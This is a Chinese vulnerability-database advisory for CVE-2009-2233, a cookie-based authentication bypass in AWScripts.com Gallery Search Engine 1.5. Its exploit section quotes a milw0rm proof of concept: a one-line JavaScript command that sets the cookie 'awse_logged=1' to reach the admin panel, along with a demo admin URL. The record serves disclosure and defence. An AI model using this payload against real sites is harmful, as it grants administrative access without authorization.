AWScripts.com Gallery Search Engine 管理界面安全绕过和权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117996 漏洞类型 授权问题
发布时间 2009-06-22 更新时间 2009-06-22
CVE编号 CVE-2009-2233 CNNVD-ID CNNVD-200906-425
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8994
https://www.securityfocus.com/bid/44407
https://cxsecurity.com/issue/WLB-2009070065
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-425
|漏洞详情
AWScripts.comGallerySearchEngine1.5版本的管理界面允许远程攻击者通过设置awse_logged成1,绕过权限并获得管理访问权。
|漏洞EXP
#################################################################################################################
[+] AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure
[+] Discovered By TiGeR-Dz
#################################################################################################################
Cookie Insecure
+++++++++++++++++++++++++
javascript:document.cookie="awse_logged=1;path=/";
Demo
----
http://www.awscripts.com/demo_se/awse/awse_admin/index.php
################################################################################################################


# milw0rm.com [2009-06-22]
|受影响的产品
AWScripts Gallery Search Engine 1.5
|参考资料

来源:XF
名称:gallerysearch-cookie-security-bypass(51276)
链接:http://xforce.iss.net/xforce/xfdb/51276
来源:VUPEN
名称:ADV-2009-1649
链接:http://www.vupen.com/english/advisories/2009/1649
来源:MILW0RM
名称:8994
链接:http://www.milw0rm.com/exploits/8994
来源:SECUNIA
名称:35513
链接:http://secunia.com/advisories/35513